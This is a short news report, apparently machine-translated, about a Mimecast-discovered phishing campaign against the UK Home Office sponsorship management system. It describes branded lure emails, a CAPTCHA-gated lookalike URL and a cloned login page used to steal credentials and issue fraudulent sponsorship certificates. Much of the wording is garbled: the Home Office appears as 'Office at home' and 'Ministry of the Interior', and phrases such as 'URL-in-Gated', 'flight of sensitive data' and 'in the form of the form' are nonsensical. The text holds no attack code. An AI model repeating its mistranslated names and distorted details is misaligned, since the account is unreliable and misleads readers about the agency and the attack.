- Mimecast discovers the phishing campaign targeting the British home office
- The accounts are stolen by phishing emails and false websites
- False sites are almost indistinguishable
A phishing campaign was discovered by Mimecast researchers targeting the Home Office sponsorship management system (SMS).
The main objective of the campaign seems to be to compromise access to accounts, which can then be sold on the Dark web, to extort organizations through the flight of sensitive data and to create fraudulent sponsorship certificates (COS).
The campaign does not only affect organizations with sponsors’ license privileges, but threatens to undermine the entire immigration system in the United Kingdom.
Office at home in the UK at risk
The attackers start the campaign by sending emails that closely resemble the legitimate emails distributed by the home office, using the same brand and the same stylization. E-mails include a call for urgent action that threatens the account suspension if the user does not connect.
The victims are guided to a false connection page via an URL-in-Gated which is very similar to the legitimate URL used by the Ministry of the Interior. After finishing the CAPTCHA, the user lands on a cloned home connection page.
The only differences between the legitimate and illegitimate pages are in the form of the form. The false page directs identification information to an attacker controlled script, where the identification information on display can be used to connect to the victims’ account.
With stolen accounts, attackers can then create false job offers and visa sponsorship schemes, and invoice the victims of tens of thousands of pounds to access them.
The best protection against phishing campaigns like this is constant vigilance. Always check the URLs and be careful of urgent action for action.
A complete list of indicators of this phishing campaign is on the Mimecast blog.
